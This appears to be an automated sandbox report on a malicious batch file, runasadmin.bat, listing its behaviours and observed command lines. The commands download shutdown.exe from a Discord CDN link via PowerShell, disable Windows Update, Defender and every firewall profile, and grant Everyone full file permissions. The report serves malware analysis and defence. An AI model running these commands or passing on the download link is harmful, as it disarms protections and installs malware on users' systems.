Analysis Overview
SHA256
f7d324eec5fc6cec83bdafd21c65e6909d847c7ea40091b87243bfd5c2c0f549
Threat Level: Known bad
The file runasadmin.bat was found to be: Known bad.
Malicious Activity Summary
Disables service(s)
Command and Scripting Interpreter: PowerShell
Modifies Windows Firewall
Possible privilege escalation attempt
Modifies file permissions
Launches sc.exe
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Runs net.exe
Suspicious use of WriteProcessMemory
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-22 18:04
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-22 18:04
Reported
2024-05-22 18:05
Platform
win7-20240221-en
Max time kernel
35s
Max time network
19s
Command Line
Signatures
Disables service(s)
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\runasadmin.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest https://cdn.discordapp.com/attachments/1239070337228865601/1242889939524259870/shutdown.exe?ex=664f7af5&is=664e2975&hm=8334727a2bec5b610b6e37fcf28e25d2d51052e173836b06f92cce2cff19e593& -OutFile C:\shutdown.exe"
C:\Windows\system32\sc.exe
sc config "wuauserv" start= disabled
C:\Windows\system32\sc.exe
sc config "TrustedInstaller" start= disabled
C:\Windows\system32\net.exe
net stop wuauserv
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wuauserv
C:\Windows\system32\net.exe
net stop TrustedInstaller
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrustedInstaller
C:\Windows\system32\takeown.exe
takeown /F C:\X\Y\Z /A /R
C:\Windows\system32\icacls.exe
icacls C:\X\Y\Z /grant Everyone:F /T
C:\Windows\system32\icacls.exe
icacls . /grant Everyone:F /T /C /Q
C:\Windows\system32\net.exe
net stop "Windows Defender Service"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Defender Service"
C:\Windows\system32\net.exe
net stop "Windows Firewall"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "Windows Firewall"
C:\Windows\system32\netsh.exe
netsh firewall set opmode disable
C:\Windows\system32\netsh.exe
netsh firewall set opmode mode=DISABLE
C:\Windows\system32\netsh.exe
netsh advfirewall set currentprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set domainprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set privateprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set publicprofile state off
C:\Windows\system32\netsh.exe
netsh advfirewall set allprofiles state off
C:\Windows\system32\timeout.exe
timeout /t 1 /nobreak
C:\Windows\explorer.exe
"C:\Windows\explorer.exe"
Network
Files